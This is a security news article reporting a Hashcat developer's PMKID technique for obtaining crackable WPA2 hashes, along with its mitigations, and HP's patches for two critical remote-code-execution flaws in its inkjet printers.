New WPA2 Attack Can Compromise Wireless Networks

Researchers have found a new and easier way of attacking wireless networks protected by the WPA2 security standard that could work against certain routers with roaming enabled.

The new technique was discovered by Jens Steube, the lead developer of the Hashcat password-cracking tool, while he was investigating the new WPA3 wireless security standard.

The attack requires cracking the Wi-Fi password, technically known as the pre-shared network key (PSK), from a cryptographic hash using brute-force methods—in this case, using Hashcat. However, with Steube’s method, obtaining the hash is much easier than before.

Until now, to attack WPA2 networks, hackers had to observe at least one client connecting to an access point (AP) and capture the full four-way Extensible Authentication Protocol over LAN (EAPOL) handshake between them. However, the new attack abuses an optional feature of the protocol called the RSN IE (Robust Security Network Information Element) that can be found in 802.11 management frames and can be obtained directly from the AP without any handshake snooping.

The RSN IE contains a value called the PMKID that’s computed by using the HMAC-SHA1 algorithm from the network key, the access point’s MAC address and the station’s MAC address.

“Since the PMK is the same as in a regular EAPOL 4-way handshake this is an ideal attacking vector,” Steube said in a post on the Hashcat forums. “We receive all the data we need in the first EAPOL frame from the AP.”

Steube’s post contains information on how to extract the data in a format that’s supported by Hashcat. However,  since ultimately breaking into the wireless network requires cracking the key through brute force, setting long and complex wireless passwords (PSKs) could mitigate this attack.

This technique doesn’t work against WPA3, because the new standard uses a new key exchange algorithm called Simultaneous Authentication of Equals (SAE) that’s significantly different and more secure.

Also, since RSN IE is an optional element, not all routers implement it. In fact, it’s only typically found in devices that have roaming capability enabled.

“Will be interesting to see against how many home routers this works,” Mathy Vanhoef, the researcher who found the KRACK attack against WPA2 last year, commented on Twitter. “Currently we can only guess, but my hunch is that most don’t support roaming (yet), so are not affected.”

“Some implementations may send the PMKID even if roaming is not enabled,” Vanhoef said. “It really depends on the implementation being attacked. Doing some tests with many devices would be useful here.”

HP Patches Critical Remote Code Execution Flaws in Inkjet Printers

HP has released firmware updates for dozens of its Inkjet printer models to address two critical vulnerabilities that could allow attackers to execute malicious code on devices.

The bugs, tracked as CVE-2018-5924 and CVE-2018-5925, can lead to stack and buffer overflows and received severity scores of 9.8 out of 10 on the CVSS scale. Attackers can exploit the vulnerabilities for remote code execution by sending maliciously crafted files to the affected devices.

Vulnerable printer series include HP Pagewide Pro, HP DesignJet, HP Officejet, HP Deskjet. HP Envy, HP Photosmart and HP Smart Tank Wireless.

Late last month, HP launched an invitation-only bug bounty program through which it rewards researchers with up to $10,000 for finding serious vulnerabilities in its business printers.

“As we navigate an increasingly complex world of cyber threats, it’s paramount that industry leaders leverage every resource possible to deliver trusted, resilient security from the firmware up,” said Shivaun Albright, HP’s Chief Technologist of Print Security, at the time. “HP is committed to engineering the most secure printers in the world.”

Lucian Constantin

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor's degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at [email protected] or @lconstantin on Twitter. For encrypted email, his PGP key's fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42

lucian-constantin has 298 posts and counting.See all posts by lucian-constantin

Cloud Workload Resilience PulseMeter

Step 1 of 8

How do you define cloud resiliency for cloud workloads? (Select 3)(Required)